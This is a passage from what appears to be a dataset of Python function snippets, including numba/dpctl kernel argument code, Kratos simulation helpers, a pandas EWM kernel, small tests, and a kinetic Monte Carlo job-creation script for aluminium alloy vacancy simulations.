),\n ty,\n )\n\n # Handle itemsize\n item_size_member = self.builder.gep(\n llvm_arg,\n [\n self.context.get_constant(types.int32, 0),\n self.context.get_constant(types.int32, 3),\n ],\n )\n\n ty = numba_type_to_dpctl_typenum(context=self.context, type=types.int64)\n self._form_kernel_arg_and_arg_ty(\n self.builder.bitcast(\n item_size_member,\n utils.get_llvm_type(context=self.context, type=types.voidptr),\n ),\n ty,\n )\n\n # Calculate total buffer size\n total_size = cgutils.alloca_once(\n self.builder,\n utils.get_llvm_type(context=self.context, type=types.intp),\n size=utils.get_one(context=self.context),\n name=\"total_size\" + str(self.cur_arg),\n )\n self.builder.store(\n self.builder.sext(\n self.builder.mul(\n self.builder.load(array_size_member),\n self.builder.load(item_size_member),\n ),\n utils.get_llvm_type(context=self.context, type=types.intp),\n ),\n total_size,\n )\n\n # Handle data\n data_member = self.builder.gep(\n llvm_arg,\n [\n self.context.get_constant(types.int32, 0),\n self.context.get_constant(types.int32, 4),\n ],\n )\n\n # names are replaced using legalize names, we have to do the same\n # here for them to match.\n legal_names = legalize_names([var])\n ty = numba_type_to_dpctl_typenum(context=self.context, type=types.voidptr)\n\n if isinstance(arg_type, nus.UsmSharedArrayType):\n self._form_kernel_arg_and_arg_ty(\n self.builder.bitcast(\n self.builder.load(data_member),\n utils.get_llvm_type(context=self.context, type=types.voidptr),\n ),\n ty,\n )\n else:\n malloc_fn = DpctlCAPIFnBuilder.get_dpctl_malloc_shared(\n builder=self.builder, context=self.context\n )\n memcpy_fn = DpctlCAPIFnBuilder.get_dpctl_queue_memcpy(\n builder=self.builder, context=self.context\n )\n event_del_fn = DpctlCAPIFnBuilder.get_dpctl_event_delete(\n builder=self.builder, context=self.context\n )\n event_wait_fn = DpctlCAPIFnBuilder.get_dpctl_event_wait(\n builder=self.builder, context=self.context\n )\n\n # Not known to be USM so we need to copy to USM.\n buffer_name = \"buffer_ptr\" + str(self.cur_arg)\n # Create void * to hold new USM buffer.\n buffer_ptr = cgutils.alloca_once(\n self.builder,\n utils.get_llvm_type(context=self.context, type=types.voidptr),\n name=buffer_name,\n )\n # Setup the args to the USM allocator, size and SYCL queue.\n args = [\n self.builder.load(total_size),\n self.builder.load(sycl_queue_val),\n ]\n # Call USM shared allocator and store in buffer_ptr.\n self.builder.store(self.builder.call(malloc_fn, args), buffer_ptr)\n\n if legal_names[var] in modified_arrays:\n self.write_buffs.append((buffer_ptr, total_size, data_member))\n else:\n self.read_only_buffs.append((buffer_ptr, total_size, data_member))\n\n # We really need to detect when an array needs to be copied over\n if index < self.num_inputs:\n args = [\n self.builder.load(sycl_queue_val),\n self.builder.load(buffer_ptr),\n self.builder.bitcast(\n self.builder.load(data_member),\n utils.get_llvm_type(\n context=self.context, type=types.voidptr\n ),\n ),\n self.builder.load(total_size),\n ]\n event_ref = self.builder.call(memcpy_fn, args)\n self.builder.call(event_wait_fn, [event_ref])\n self.builder.call(event_del_fn, [event_ref])\n\n self._form_kernel_arg_and_arg_ty(self.builder.load(buffer_ptr), ty)\n\n # Handle shape\n shape_member = self.builder.gep(\n llvm_arg,\n [\n self.context.get_constant(types.int32, 0),\n self.context.get_constant(types.int32, 5),\n ],\n )\n\n for this_dim in range(arg_type.ndim):\n shape_entry = self.builder.gep(\n shape_member,\n [\n 
self.context.get_constant(types.int32, 0),\n self.context.get_constant(types.int32, this_dim),\n ],\n )\n ty = numba_type_to_dpctl_typenum(context=self.context, type=types.int64)\n self._form_kernel_arg_and_arg_ty(\n self.builder.bitcast(\n shape_entry,\n utils.get_llvm_type(context=self.context, type=types.voidptr),\n ),\n ty,\n )\n\n # Handle strides\n stride_member = self.builder.gep(\n llvm_arg,\n [\n self.context.get_constant(types.int32, 0),\n self.context.get_constant(types.int32, 6),\n ],\n )\n\n for this_stride in range(arg_type.ndim):\n stride_entry = self.builder.gep(\n stride_member,\n [\n self.context.get_constant(types.int32, 0),\n self.context.get_constant(types.int32, this_stride),\n ],\n )\n\n ty = numba_type_to_dpctl_typenum(context=self.context, type=types.int64)\n self._form_kernel_arg_and_arg_ty(\n self.builder.bitcast(\n stride_entry,\n utils.get_llvm_type(context=self.context, type=types.voidptr),\n ),\n ty,\n )\n\n else:\n ty = numba_type_to_dpctl_typenum(context=self.context, type=arg_type)\n self._form_kernel_arg_and_arg_ty(\n self.builder.bitcast(\n llvm_arg,\n utils.get_llvm_type(context=self.context, type=types.voidptr),\n ),\n ty,\n )", "def ExecuteInstanceDeterministicAdaptiveRefinementAux_Functionality(pickled_model,pickled_project_parameters,current_analysis_stage,random_variable,previous_computational_time,mapping_flag,pickled_mapping_reference_model,print_to_file,filename,open_mp_threads):\n\n start_time = time.time()\n # overwrite the old model serializer with the unpickled one\n model_serializer = pickle.loads(pickled_model)\n current_model = KratosMultiphysics.Model()\n model_serializer.Load(\"ModelSerialization\",current_model)\n del(model_serializer)\n # overwrite the old parameters serializer with the unpickled one\n serialized_project_parameters = pickle.loads(pickled_project_parameters)\n current_project_parameters = KratosMultiphysics.Parameters()\n serialized_project_parameters.Load(\"ParametersSerialization\",current_project_parameters)\n del(serialized_project_parameters)\n\n # Set IS_RESTARTED flag to True, STEP to zero and TIME to 0,\n # since the model has already been initialized and eventually run.\n # The model we run is coming from\n # level 0: directly from serialization, where Initialize() method is called\n # level > 0: from ExecuteInstanceStochasticAdaptiveRefinementAux_Functionality(),\n # where the model is run and then returned as an output.\n model_part_name = current_project_parameters[\"solver_settings\"][\"model_part_name\"].GetString()\n current_model.GetModelPart(model_part_name).ProcessInfo.SetValue(KratosMultiphysics.TIME, 0.0)\n current_model.GetModelPart(model_part_name).ProcessInfo.SetValue(KratosMultiphysics.STEP, 0)\n current_model.GetModelPart(model_part_name).ProcessInfo.SetValue(KratosMultiphysics.IS_RESTARTED, True)\n\n # constructor analysis stage\n simulation = current_analysis_stage(current_model,current_project_parameters,random_variable)\n # add filename flag print_to_file is true\n if (print_to_file):\n simulation.filename = filename\n # add flag if current index is maximum index: always True\n simulation.is_current_index_maximum_index = True\n # mapping if in current finest level (always true) and mapping flag is true\n # otherwise standard behavior\n if (mapping_flag is True):\n # unpickle mapping reference model and build Kratos Model object\n serialized_mapping_reference_model = pickle.loads(pickled_mapping_reference_model)\n mapping_reference_model = KratosMultiphysics.Model()\n 
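# Load() deserializes into the freshly constructed, empty Model object;\n        # the serializer is deleted immediately afterwards to free memory\n        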
serialized_mapping_reference_model.Load(\"ModelSerialization\",mapping_reference_model)\n del(serialized_mapping_reference_model)\n # send reference model to analysis stage for mapping and set mapping flag to true\n simulation.mapping_reference_model = mapping_reference_model\n simulation.mapping = True\n simulation.Run()\n # mapping if in current finest level and mapping flag is true\n # otherwise standard qoi evaluation\n if (mapping_flag is True):\n qoi = simulation.MappingAndEvaluateQuantityOfInterest()\n else:\n qoi = simulation.EvaluateQuantityOfInterest()\n del(simulation)\n end_time = time.time()\n computational_time = previous_computational_time + open_mp_threads*(end_time-start_time) # multiply by open mp threads to consider real machine cost\n return qoi,computational_time", "def parallelize_initfunction(targetlist, callerfunc,concurrentevents=5, *extrafuncargs):\r\n\r\n parallelizehandle = uniqueid_getid()\r\n\r\n # set up the dict locally one line at a time to avoid a ginormous line\r\n handleinfo = {}\r\n handleinfo['abort'] = False\r\n handleinfo['callfunc'] = callerfunc\r\n handleinfo['callargs'] = extrafuncargs\r\n # make a copy of target list because \r\n handleinfo['targetlist'] = targetlist[:]\r\n handleinfo['availabletargetpositions'] = range(len(handleinfo['targetlist']))\r\n handleinfo['result'] = {'exception':[],'returned':[],'aborted':[]}\r\n handleinfo['runninglist'] = []\r\n\r\n \r\n parallelize_info_dict[parallelizehandle] = handleinfo\r\n\r\n # don't start more threads than there are targets (duh!)\r\n threads_to_start = min(concurrentevents, len(handleinfo['targetlist']))\r\n\r\n for workercount in range(threads_to_start):\r\n # we need to append the workercount here because we can't return until \r\n # this is scheduled without having race conditions\r\n parallelize_info_dict[parallelizehandle]['runninglist'].append(workercount)\r\n try:\r\n settimer(0.0, parallelize_execute_function, (parallelizehandle,workercount))\r\n except:\r\n # If I'm out of resources, stop\r\n # remove this worker (they didn't start)\r\n parallelize_info_dict[parallelizehandle]['runninglist'].remove(workercount)\r\n if not parallelize_info_dict[parallelizehandle]['runninglist']:\r\n parallelize_closefunction(parallelizehandle)\r\n raise Exception, \"No events available!\"\r\n break\r\n \r\n return parallelizehandle", "def _minmaxkernel_numba(data_1, data_2):\n\n\n result = np.zeros((data_1.shape[0], data_2.shape[0]), dtype=np.float64)\n\n for i in prange(data_1.shape[0]):\n for j in prange(data_2.shape[0]):\n result[i,j] = _minmax_two_fp(data_1[i], data_2[j])\n return result", "def ms_function(fn=None, input_signature=None, hash_args=None, jit_config=None):\n\n logger.warning(\"'mindspore.ms_function' will be deprecated and removed in a future version. \"\n \"Please use 'mindspore.jit' instead.\")\n return jit(fn=fn, input_signature=input_signature, hash_args=hash_args, jit_config=jit_config)", "def initialize(self):\n # set the maximum queue size (number of jobs to queue past the running number)\n self.maxQueueSize = self.runInfoDict['maxQueueSize']\n # defaults to None; if None, then use batchSize instead\n if self.maxQueueSize is None:\n self.maxQueueSize = self.runInfoDict['batchSize']\n # if requested max size less than 1, we can't do that, so take 1 instead\n if self.maxQueueSize < 1:\n self.raiseAWarning('maxQueueSize was set to be less than 1! 
Setting to 1...')\n self.maxQueueSize = 1\n self.raiseADebug('Setting maxQueueSize to', self.maxQueueSize)\n\n # initialize PBS\n with self.__queueLock:\n self.__running = [None]*self.runInfoDict['batchSize']\n self.__clientRunning = [None]*self.runInfoDict['batchSize']\n self._parallelLib = ParallelLibEnum.shared\n if self.runInfoDict['parallelMethod'] is not None and self.runInfoDict['parallelMethod'] != ParallelLibEnum.distributed:\n self._parallelLib = self.runInfoDict['parallelMethod']\n elif self.runInfoDict['internalParallel'] or \\\n self.runInfoDict['parallelMethod'] is not None and self.runInfoDict['parallelMethod'] == ParallelLibEnum.distributed:\n #If ParallelLibEnum.distributed or internalParallel True\n # than choose a library automatically.\n if _daskAvail:\n self._parallelLib = ParallelLibEnum.dask\n elif _rayAvail:\n self._parallelLib = ParallelLibEnum.ray\n else:\n self.raiseAWarning(\"Distributed Running requested but no parallel method found\")\n self._parallelLib = ParallelLibEnum.shared\n desiredParallelMethod = f\"parallelMethod: {self.runInfoDict['parallelMethod']} internalParallel: {self.runInfoDict['internalParallel']}\"\n self.raiseADebug(f\"Using parallelMethod: {self._parallelLib} because Input: {desiredParallelMethod} and Ray Availablility: {_rayAvail} and Dask Availabilitiy: {_daskAvail}\")\n if self._parallelLib == ParallelLibEnum.dask and not _daskAvail:\n self.raiseAnError(RuntimeError, f\"dask requested but not available. {desiredParallelMethod}\")\n if self._parallelLib == ParallelLibEnum.ray and not _rayAvail:\n self.raiseAnError(RuntimeError, f\"ray requested but not available. {desiredParallelMethod}\")\n # internal server is initialized only in case an internal calc is requested\n if not self.__isDistributedInitialized:\n self.__initializeDistributed()", "def minimize(fun, \n bounds = None, \n value_limit = math.inf,\n num_retries = 1000,\n logger = None,\n workers = mp.cpu_count(),\n popsize = 31, \n max_evaluations = 50000, \n capacity = 500,\n stop_fittness = None,\n optimizer = None,\n ):\n\n if optimizer is None:\n optimizer = de_cma(max_evaluations, popsize, stop_fittness) \n store = Store(bounds, capacity = capacity, logger = logger)\n return retry(fun, store, optimizer.minimize, num_retries, value_limit, workers)", "def test_onearg_and_default(self):\n varargs = (12,)\n kwargs = {}\n method = getattr(self.foo,'f_onearg_and_default')\n var_dict = reassign_function_arguments(method, varargs, kwargs)\n self.assert_(var_dict['arg1'] == 12)\n self.assert_(var_dict['default'] == 1)\n self.assert_(len(var_dict) == 2)\n var_dict = reassign_function_arguments(method, (12, 13), kwargs)\n self.assert_(var_dict['arg1'] == 12)\n self.assert_(var_dict['default'] == 13)\n self.assert_(len(var_dict) == 2)", "def job_in(fn):\n @wraps(fn)\n def new(job):\n # do something with the job object\n return fn(job.arg)\n return new", "def job_gen(self, time_frame):", "def generate_numba_ewm_func(\n nopython: bool,\n nogil: bool,\n parallel: bool,\n com: float,\n adjust: bool,\n ignore_na: bool,\n deltas: tuple,\n normalize: bool,\n):\n if TYPE_CHECKING:\n import numba\n else:\n numba = import_optional_dependency(\"numba\")\n\n @numba.jit(nopython=nopython, nogil=nogil, parallel=parallel)\n def ewm(\n values: np.ndarray,\n begin: np.ndarray,\n end: np.ndarray,\n minimum_periods: int,\n ) -> np.ndarray:\n result = np.empty(len(values))\n alpha = 1.0 / (1.0 + com)\n old_wt_factor = 1.0 - alpha\n new_wt = 1.0 if adjust else alpha\n\n for i in numba.prange(len(begin)):\n 
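# each prange iteration handles one [start, stop) window independently,\n            # carrying the running EWM state (weighted, old_wt, nobs) across it\n            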
start = begin[i]\n stop = end[i]\n window = values[start:stop]\n sub_result = np.empty(len(window))\n\n weighted = window[0]\n nobs = int(not np.isnan(weighted))\n sub_result[0] = weighted if nobs >= minimum_periods else np.nan\n old_wt = 1.0\n\n for j in range(1, len(window)):\n cur = window[j]\n is_observation = not np.isnan(cur)\n nobs += is_observation\n if not np.isnan(weighted):\n if is_observation or not ignore_na:\n if normalize:\n # note that len(deltas) = len(vals) - 1 and deltas[i]\n # is to be used in conjunction with vals[i+1]\n old_wt *= old_wt_factor ** deltas[start + j - 1]\n else:\n weighted = old_wt_factor * weighted\n if is_observation:\n if normalize:\n # avoid numerical errors on constant series\n if weighted != cur:\n weighted = old_wt * weighted + new_wt * cur\n if normalize:\n weighted = weighted / (old_wt + new_wt)\n if adjust:\n old_wt += new_wt\n else:\n old_wt = 1.0\n else:\n weighted += cur\n elif is_observation:\n weighted = cur\n\n sub_result[j] = weighted if nobs >= minimum_periods else np.nan\n\n result[start:stop] = sub_result\n\n return result\n\n return ewm", "def test_MPI_Parallel_Interface(comm):\n\n def printMPI(msg):\n for i in range(comm.Get_size()):\n comm.barrier()\n if comm.Get_rank() == i:\n print(\"Proc {}: {}\".format(i, msg))\n\n n = 10\n\n par = MPI_Objective_Interface(mp.Extended_Rosenbrock, nb_domain_grid_pts=n,\n comm=comm)\n\n printMPI(par.counts)\n\n # ref = mp.Extended_Rosenbrock\n\n np.testing.assert_array_equal(\n mp.Extended_Rosenbrock.startpoint(n)[par.subdomain_slices],\n par.startpoint())\n np.testing.assert_almost_equal(\n mp.Extended_Rosenbrock.f(mp.Extended_Rosenbrock.startpoint(n)),\n par.f(par.startpoint()),\n err_msg=\"Different Function Value at startpoint\")\n np.testing.assert_allclose(\n mp.Extended_Rosenbrock.grad(mp.Extended_Rosenbrock.startpoint(n))[\n par.subdomain_slices],\n par.grad(par.startpoint()),\n err_msg=\"Different Gradient Value at startpoint\")", "def test_parallel_kwargs():\r\n lst = range(10)\r\n for n_jobs in (1, 4):\r\n yield (nose.tools.assert_equal,\r\n [f(x, y=1) for x in lst],\r\n Parallel(n_jobs=n_jobs)(delayed(f)(x, y=1) for x in lst)\r\n )", "def func(job):\n return start_process(job)", "def nop_minifier(arg):\n return arg", "def par(func):\n opt[\"par\"].add(key(func))\n return func", "def test_SMEB_args():\n testing_function('sme_bl', bilinear=True)", "def parallel(self, func, args_dict=None):\n try:\n self.parallel_safe(func, args_dict)\n except Exception:\n pass", "def sum_numba(A):\n N = A.shape\n B = np.zeros((N[0], N[2]))\n for i in range(N[0]):\n for j in range(N[2]):\n for k in range(N[1]):\n B[i, j] += A[i, k, j]\n return B", "def __init__(self, n_jobs=1, verbose=True):\n self.n_jobs = n_jobs\n self.verbose = verbose", "def createjob(args):\n ncell = args.ncell\n nmg = args.nmg\n nsi = args.nsi\n nvac = args.nvac\n a0 = args.a0\n temp = args.temp\n nseeds = args.nseeds\n seeds = args.seeds\n nsteps = args.nsteps\n foldername_append = args.foldername_append\n pot = args.pot\n submit = args.submit\n submitdebug = args.submitdebug\n submittime_hours = args.submittime_hours\n test = args.test\n testfiles = args.testfiles\n nodes = args.nodes\n verbose = args.verbose\n\n\n ### check if ase runner/quippy/lammpps-data formats are known\n ase_formats = mu.ase_get_known_formats_class(verbose=True)\n ase_formats.check_if_default_formats_known(copy_and_adapt_formatspy_anyhow=False)\n\n # definex ffsocket inet/unix\n if nodes == 1:\n ffsocket = \"unix\"\n elif nodes > 1:\n ffsocket = \"inet\"\n 
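# unix sockets are node-local, so multi-node runs fall back to inet,\n    # as this branching implies\n    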
else:\n sys.exit(\"Number of nodes has to be positive!\")\n\n\n # define ntasks, neval\n lmp_par = 2 # = OMP_NUM_THREADS\n ntasks = cores = nodes * 28\n ipi_inst = 4 # for sure best on fidis\n neval = ipi_inst*2 # was alwasy better, for ompi and impi\n\n ##### get the seed(s).\n if type(seeds) == bool:\n seeds = random.sample(range(1, 999999), nseeds)\n print('seeds',seeds)\n if test == True:\n nseeds = 1\n seeds = [1]\n print('seeds',seeds)\n nseeds = len(seeds)\n\n ##### a few checks\n scripts = mu.scripts()\n mypot = mu.mypot(pot)\n if submit is True or submitdebug is True:\n hostcheck = os.environ[\"myhost\"]\n if hostcheck == \"\":\n sys.exit('host unknown 87')\n\n\n ##### here only chck if the potential can be set up. (in.lmp)\n ##### the same command is then executed for every kmc folder\n ace = mu.ase_calculate_ene(pot=pot,\n potpath=False,\n units='eV',geopt=False,kmc=True,verbose=verbose)\n ace.pot_get_and_ase_lmp_cmd(kmc=True,temp=temp,nsteps=nsteps,ffsocket=ffsocket)\n\n ##### if test\n if test == True:\n nsteps = 50\n\n file_ipi_input_runner = scripts + \"/i-pi-mc_scripts/input-runner.xml\"\n\n\n ####################################\n # get directory\n ####################################\n if verbose:\n print(\"get directory\")\n pcsi = nsi/ncell**3.*100\n pcmg = nmg/ncell**3.*100\n pcvac = nvac/ncell**3.*100\n if args.cubic == True:\n pc = \"cubic\"\n else:\n pc = \"primitive\"\n directory = str(ncell)+\"x\"+str(ncell)+\"x\"+str(ncell)+\"_\"+pc+\"_\"+pot+\"_\"+\\\n str(temp)+\"K_\"+\\\n str(nvac)+\"Vac_\"+str(nmg)+\"Mg_\"+str(nsi)+\"Si__\"+\\\n str(round(pcvac,3))+\"pctVac_\"+str(round(pcmg,3))+\"pctMg_\"+str(round(pcsi,3))+\"pctSi\"\n if foldername_append != \"\":\n directory = directory+\"_\"+foldername_append\n\n ###############################################\n # make the structure\n ###############################################\n atomsc_fakevac = mu.get_ase_atoms_object_kmc_al_si_mg_vac(ncell,nsi,nmg,nvac,a0,create_fake_vacancy = True,cubic=args.cubic)\n atomsc = mu.get_ase_atoms_object_kmc_al_si_mg_vac(ncell,nsi,nmg,nvac,a0,cubic=args.cubic)\n\n # make the atomic structure\n # this was to play ... 
not necessary now?\n if False:\n nndist = a0/np.sqrt(2.)\n\n from ase.io import read as ase_read\n from ase.io import write as ase_write\n\n ###############################################\n # get the amount of 1NN in a relly large cell\n ###############################################\n atomsc_fakevac_i = ase_read('dataxx.extxyz3',index=\":\",format='extxyz') # works, cell ist not changed\n #atomsc_fakevac_i = mu.get_ase_atoms_object_kmc_al_si_mg_vac(ncell=10,nsi=0,nmg=0,nvac=1,a0=a0,cubic=False,create_fake_vacancy = True,normal_ordering=\"XX_0\")\n #nn = mu.ase_get_neighborlist(atomsc_fakevac_i,atomnr=0,cutoff=3.,skin=0.1)\n #print(\"nn\",nn,'len',len(nn))\n #nn = mu.ase_get_neighborlist(atomsc_fakevac_i,atomnr=0,cutoff=8.5,skin=0.1)\n #print(\"nn\",nn,'len',len(nn))\n #sys.exit()\n\n print(len(atomsc_fakevac_i),type(atomsc_fakevac_i))\n\n for idx,i in enumerate(atomsc_fakevac_i):\n print('aa',atomsc_fakevac_i[idx].positions[0])\n #print('aa',i.positions[0])\n print('ipi')\n atomsc_fakevac_i = ase_read('dataxx.ipi2',index=\":\",format='ipi') # works, cell ist not changed\n print(len(atomsc_fakevac_i),type(atomsc_fakevac_i))\n for idx,i in enumerate(atomsc_fakevac_i):\n print('aa',atomsc_fakevac_i[idx].positions[0])\n #print('aa',i.positions[0])\n print('quippy')\n atomsc_fakevac_i = ase_read('dataxx.quippy.xyz2',index=\":\",format='quippy') # works, cell ist not changed\n\n\n\n filename = '../sim.xyz'\n filename = '../simulation.pos_0.xyz'\n mu.count_amount_1NN_around_vacancies(filename,cutoffa=nndist,cutoffb=a0,skin=0.1,format='ipi')\n sys.exit()\n\n def mysave_quippy_xyz(atomsc_fakevac,text=False):\n if type(text) == bool:\n sys.exit('define text')\n atomsc_fakevac.write('data.quippy.xyz',format='quippy',append=True)\n #atomsc_fakevac.write('data.xyz',format=\"extxyz\",append=True)\n atomsc_fakevac.write('data'+text+'.quippy.xyz',format='quippy',append=True)\n #atomsc_fakevac.write('data'+text+'.xyz',format=\"extxyz\",append=True)\n return\n\n # create Al with single vacancy\n atomsc_fakevac = mu.get_ase_atoms_object_kmc_al_si_mg_vac(ncell=5,nsi=0,nmg=0,nvac=1,a0=a0,cubic=False,create_fake_vacancy = True,normal_ordering=\"XX_0\")\n NN_1_indices, NN_2_indices = mu.ase_get_neighborlist_1NN_2NN(atomsc_fakevac,atomnr=0,cutoffa=nndist,cutoffb=a0,skin=0.1)\n #print('from ....',(atomsc_fakevac.positions)[0])\n #for i in NN_1_indices:\n # print((atomsc_fakevac.positions)[i])\n print('NN_1_indices (orig ):',NN_1_indices)\n print('NN_2_indices (orig ):',NN_2_indices)\n #sys.exit()\n atomsc_fakevac.write('dataxx.quippy.xyz',format='quippy',append=True)\n atomsc_fakevac.write('dataxx.poscar',format='vasp',append=True)\n atomsc_fakevac.write('dataxx.ipi',format='ipi',append=True) # works, currently so implemented that it canges cell\n atomsc_fakevac.write('dataxx.xyz',format='xyz',append=True)\n atomsc_fakevac.write('dataxx.extxyz',format='extxyz',append=True)\n atomsc_fakevac.write('dataxx.lammps-data',format='lammps-data',append=True)\n atomsc_fakevac.write('dataxx.lammps-runner',format='lammps-runner',append=True)\n\n atomsc_fakevac_a = ase_read('dataxx.extxyz',format='extxyz') # works, cell ist not changed\n atomsc_fakevac_a.write('dataxx.extxyz2',format='extxyz',append=True) # works, cell is not changed\n\n atomsc_fakevac_b = ase_read('dataxx.xyz',format='xyz') # not working # but this should work\n atomsc_fakevac_b.write('dataxx.xyz2',format='xyz',append=True) # this is working\n\n atomsc_fakevac_c = ase_read('dataxx.ipi',format='ipi') # works, currently so implemented that it canges cell\n 
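# round-trip check: write the ipi structure back out and compare 1NN/2NN\n        # neighbor lists against the original to see whether positions survive\n        # the cell-convention change noted above\n        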
#print('ipi cell',atomsc_fakevac_c.get_cell())\n\n atomsc_fakevac_c.write('dataxx.ipi2',format='ipi',append=True) # works, just writes the cell it gests.\n atomsc_fakevac_c.write('dataxx.ipi2_poscar',format='vasp',append=True) # works, just writes the cell it gests.\n NN_1_indices, NN_2_indices = mu.ase_get_neighborlist_1NN_2NN(atomsc_fakevac_c,atomnr=0,cutoffa=nndist,cutoffb=a0,skin=0.1)\n print('NN_1_indices (ipi ):',NN_1_indices)\n print('NN_2_indices (ipi ):',NN_2_indices)\n #print('from ....',(atomsc_fakevac_c.positions)[0])\n #for i in NN_1_indices:\n # print((atomsc_fakevac_c.positions)[i])\n\n atomsc_fakevac_cc = ase_read('dataxx.ipi2_poscar',format='vasp') # works, currently so implemented that it canges cell\n atomsc_fakevac_cc.write('dataxx.ipi2_poscar2',format='vasp',append=True)\n atomsc_fakevac_cc.write('dataxx.ipi2_poscar2_ipi',format='ipi',append=True) # works, just writes the cell it gests.\n #print('ipi cell2 (ext):',atomsc_fakevac_cc.get_cell())\n #print()\n #print('now quippy')\n atomsc_fakevac_d = ase_read('dataxx.quippy.xyz',format='quippy')\n #print('quippy cell (ext)',atomsc_fakevac_d.get_cell())\n atomsc_fakevac_d.write('dataxx.quippy.xyz2',format='quippy',append=True)\n atomsc_fakevac_d.write('dataxx.quippy.xyz2_extxyz',format='extxyz',append=True)\n NN_1_indices, NN_2_indices = mu.ase_get_neighborlist_1NN_2NN(atomsc_fakevac_d,atomnr=0,cutoffa=nndist,cutoffb=a0,skin=0.1)\n print('NN_1_indices (quippy):',NN_1_indices)\n print('NN_2_indices (quippy):',NN_2_indices)\n #print('from ....',(atomsc_fakevac_d.positions)[0])\n #for i in NN_1_indices:\n # print((atomsc_fakevac_d.positions)[i])\n path = \"/home/glensk/kmc/run_michele/Si6Mg6V1.1_/simulation.pos_libatom_2struct.xyz\"\n atomsc_fakevac_e = ase_read(path,format='quippy')\n\n NN_1_indices, NN_2_indices = mu.ase_get_neighborlist_1NN_2NN(atomsc_fakevac_e,atomnr=0,cutoffa=nndist,cutoffb=a0,skin=0.1)\n print('NN_1_indices (kmc ):',NN_1_indices)\n print('NN_2_indices (kmc ):',NN_2_indices)\n sys.exit()\n\n NN_1_indices = mu.ase_get_neighborlist(atomsc_fakevac,atomnr=0,cutoff=nndist,skin=0.1)\n NN_1_2_indices_tmp = mu.ase_get_neighborlist(atomsc_fakevac,atomnr=0,cutoff=a0,skin=0.1)\n print('NN_1_indices :',NN_1_indices)\n NN_2_indices = np.sort(np.array(mu.diff(NN_1_2_indices_tmp,NN_1_indices)))\n print('NN_2_indices :',NN_2_indices)\n NN_1_2_indices = np.concatenate((NN_1_indices, NN_2_indices ))\n print('NN_1_2_indices:',NN_1_2_indices)\n\n\n # fill only 1NN (with one species)\n for i in [ 'Mg', 'Si' ]:\n atomsc_fakevac = mu.get_ase_atoms_object_kmc_al_si_mg_vac(ncell=5,nsi=0,nmg=0,nvac=1,a0=a0,cubic=False,create_fake_vacancy = True,normal_ordering=\"XX_0\")\n mysave_quippy_xyz(atomsc_fakevac,text=\"1NN\")\n for ii in NN_1_indices:\n atomsc_fakevac[ii].symbol = i\n mysave_quippy_xyz(atomsc_fakevac,text=\"1NN\")\n\n # fill only 2NN (with one species)\n for i in [ 'Mg', 'Si' ]:\n atomsc_fakevac = mu.get_ase_atoms_object_kmc_al_si_mg_vac(ncell=5,nsi=0,nmg=0,nvac=1,a0=a0,cubic=False,create_fake_vacancy = True,normal_ordering=\"XX_0\")\n mysave_quippy_xyz(atomsc_fakevac,text=\"2NN\")\n for ii in NN_2_indices:\n atomsc_fakevac[ii].symbol = i\n mysave_quippy_xyz(atomsc_fakevac,text=\"2NN\")\n\n # fill 1NN and 2NN (with one species)\n for i in [ 'Mg', 'Si' ]:\n atomsc_fakevac = mu.get_ase_atoms_object_kmc_al_si_mg_vac(ncell=5,nsi=0,nmg=0,nvac=1,a0=a0,cubic=False,create_fake_vacancy = True,normal_ordering=\"XX_0\")\n mysave_quippy_xyz(atomsc_fakevac,text=\"1and2NN\")\n for ii in NN_1_2_indices:\n atomsc_fakevac[ii].symbol = 
i\n mysave_quippy_xyz(atomsc_fakevac,text=\"1and2NN\")\n\n # dif compositions in 1NN shell\n filling = [ 2,4,6,8,10]\n for fi in filling:\n atomsc_fakevac = mu.get_ase_atoms_object_kmc_al_si_mg_vac(ncell=5,nsi=0,nmg=0,nvac=1,a0=a0,cubic=False,create_fake_vacancy = True,normal_ordering=\"XX_0\")\n mysave_quippy_xyz(atomsc_fakevac,text=\"1NN_diffcomp\")\n for idx,ii in enumerate(NN_1_indices):\n if idx < fi: ch = \"Mg\"\n else: ch = \"Si\"\n atomsc_fakevac[ii].symbol = ch\n mysave_quippy_xyz(atomsc_fakevac,text=\"1NN_diffcomp\")\n\n\n sys.exit()\n\n #mu.ase_get_known_formats(show=True, add_missing_formats=False, copy_formats=False, verbose=False,show_formatspy=True)\n for i in [ 'Mg', 'Si' ]:\n for ii in [ 0,1,2,3,4,5]:\n atomsc_fakevac = mu.get_ase_atoms_object_kmc_al_si_mg_vac(ncell=5,nsi=0,nmg=0,nvac=1,a0=a0,cubic=False,create_fake_vacancy = True,normal_ordering=i+'_'+str(ii))\n\n\n sys.exit()\n\n\n # show the input variables\n print('--------------------------- check the input --------------------------------')\n print('JOBS (nseeds) ',nseeds,'(defined by -nseeds / or -seeds)')\n print('seeds ',seeds)\n print('nsteps ',nsteps)\n print()\n print('ncell ',ncell,\"(\",atomsc.get_number_of_atoms(),\"atoms )\")\n print('nsi ',nsi, \"(\",pcsi,\"at%)\")\n print('nmg ',nmg,\"(\",pcmg,\"at%)\")\n print('nvac ',nvac,\"(\",pcvac,\"at%)\")\n print('a0 ',a0,\"angstrom\")\n print('temp ',temp,\"K\")\n print()\n print('mypot.pot ',mypot.pot)\n print('mypot.potpath ',mypot.potpath)\n print()\n print('directory ',directory)\n print('submit ',submit)\n print('submitdebug ',submitdebug)\n print()\n print('nodes ',nodes)\n print('ffsocket ',ffsocket)\n #print('python ver ',sys.version_info[0])\n #print()\n print('--------------------------- check the input --------------------------------')\n if submit == True or submitdebug == True:\n mu.get_from_prompt_Yy_orexit(\"Are the ine input variables ok? [y]es: \")\n\n # make the directory\n if os.path.isdir(directory):\n mu.get_from_prompt_Yy_orexit(\"This main directory exists already, shall I add jobs? 
